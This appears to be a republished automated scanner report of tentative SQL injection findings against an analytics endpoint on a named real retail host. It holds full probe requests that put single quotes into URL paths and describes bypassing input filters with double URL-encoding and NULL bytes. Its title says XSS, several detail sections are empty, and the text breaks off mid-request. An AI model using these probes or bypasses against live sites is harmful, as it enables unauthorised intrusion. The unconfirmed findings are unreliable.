XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09032011-03

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s81099810544401 [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wa.proflowers.com
Path:	/b/ss/proflodevelopment/1/H.22.1/s81099810544401

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/proflodevelopment/1/H.22.1/s81099810544401?AQB=1&pccr=true&vidn=2731657005162764-60000183E0004D48&&ndh=1&t=3%2F8%2F2011%2019%3A49%3A10%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD29&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=70&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt2%3A%3Atmm2%3A%3Atpp4%3Atrm1%3Attb3%3Atpf2%3A%3Atbc1%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=54c64013-5ca6-4b8c-981b-97bc288ebb06&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb2%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf2%3A%3A%3Anta2%3Antb1%3Antc1%3Antd1%3Ante3%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657005162764-60000183E0004D48[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:17:05 GMT
Server: Omniture DC/2.0.0
Content-Length: 445
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/proflodevelopment/1/H.22.1/s81099810544401 w
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/proflodevelopment/1/H.22.1/s81099810544401?AQB=1&pccr=true&vidn=2731657005162764-60000183E0004D48&&ndh=1&t=3%2F8%2F2011%2019%3A49%3A10%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD29&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=70&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt2%3A%3Atmm2%3A%3Atpp4%3Atrm1%3Attb3%3Atpf2%3A%3Atbc1%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=54c64013-5ca6-4b8c-981b-97bc288ebb06&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb2%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf2%3A%3A%3Anta2%3Antb1%3Antc1%3Antd1%3Ante3%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657005162764-60000183E0004D48[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:17:05 GMT
Server: Omniture DC/2.0.0
xserver: www635
Content-Length: 0
Content-Type: text/html

1.2. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s84142070419620 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wa.proflowers.com
Path:	/b/ss/proflodevelopment/1/H.22.1/s84142070419620

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/proflodevelopment/1/H.22.1/s84142070419620?AQB=1&ndh=1&t=3%2F8%2F2011%2019%3A49%3A20%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD24&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=71&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt1%3A%3Atmm2%3A%3Atpp4%3Atrm1%3Attb4%3Atpf2%3A%3Atbc1%3Athp2%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=15a5afb5-0d9c-45c7-84a2-3460492ea8f1&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms2%3Atvc1%3A%3A%3A%3A%3Atxb2%3Atxc1%3A%3A%3A%3A%3A%3Atnp2%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf1%3A%3A%3Anta2%3Antb2%3Antc2%3Antd1%3Ante3%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-new-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-new-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:20:50 GMT
Server: Omniture DC/2.0.0
Content-Length: 399
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/proflodevelopment/1/H.22.1/s84142070419620?AQB=1&ndh=1&t=3%2F8%2F2011%2019%3A49%3A20%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD24&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=71&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt1%3A%3Atmm2%3A%3Atpp4%3Atrm1%3Attb4%3Atpf2%3A%3Atbc1%3Athp2%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=15a5afb5-0d9c-45c7-84a2-3460492ea8f1&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms2%3Atvc1%3A%3A%3A%3A%3Atxb2%3Atxc1%3A%3A%3A%3A%3A%3Atnp2%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf1%3A%3A%3Anta2%3Antb2%3Antc2%3Antd1%3Ante3%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-new-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-new-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:20:50 GMT
Server: Omniture DC/2.0.0
xserver: www650
Content-Length: 0
Content-Type: text/html

1.3. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s84476320391986 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wa.proflowers.com
Path:	/b/ss/proflodevelopment/1/H.22.1/s84476320391986

Issue detail

Remediation detail

Request 1

GET /b/ss%00'/proflodevelopment/1/H.22.1/s84476320391986?AQB=1&ndh=1&t=3%2F8%2F2011%2019%3A49%3A15%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD23&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=34&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt2%3A%3Atmm1%3A%3Atpp3%3Atrm1%3Attb4%3Atpf1%3A%3Atbc1%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=81ea4087-d623-410d-aa84-36102d92184b&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb2%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf2%3A%3A%3Anta2%3Antb2%3Antc2%3Antd1%3Ante1%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:15 GMT
Server: Omniture DC/2.0.0
Content-Length: 399
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/proflodevelopment/1/H.22.1/s84476320391986?AQB=1&ndh=1&t=3%2F8%2F2011%2019%3A49%3A15%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD23&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=34&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt2%3A%3Atmm1%3A%3Atpp3%3Atrm1%3Attb4%3Atpf1%3A%3Atbc1%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=81ea4087-d623-410d-aa84-36102d92184b&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb2%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf2%3A%3A%3Anta2%3Antb2%3Antc2%3Antd1%3Ante1%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:15 GMT
Server: Omniture DC/2.0.0
xserver: www616
Content-Length: 0
Content-Type: text/html

1.4. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s85063178692944 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wa.proflowers.com
Path:	/b/ss/proflodevelopment/1/H.22.1/s85063178692944

Issue detail

Request 1

GET /b'/ss/proflodevelopment/1/H.22.1/s85063178692944?AQB=1&pccr=true&vidn=2731657085158532-6000017500001E87&&ndh=1&t=3%2F8%2F2011%2019%3A49%3A11%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD25&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=6&c11=PCR&c12=true&v12=%3A%3Atks3%3Atkt1%3A%3Atmm2%3A%3Atpp3%3Atrm1%3Attb4%3Atpf1%3A%3Atbc3%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=2c8b00cf-c75e-4f55-839f-5b4055db896f&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb1%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf1%3A%3A%3Anta2%3Antb2%3Antc1%3Antd1%3Ante1%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:17:43 GMT
Server: Omniture DC/2.0.0
Content-Length: 443
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/proflodevelopment/1/H.22.1/s85063178692944 was
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/proflodevelopment/1/H.22.1/s85063178692944?AQB=1&pccr=true&vidn=2731657085158532-6000017500001E87&&ndh=1&t=3%2F8%2F2011%2019%3A49%3A11%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD25&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5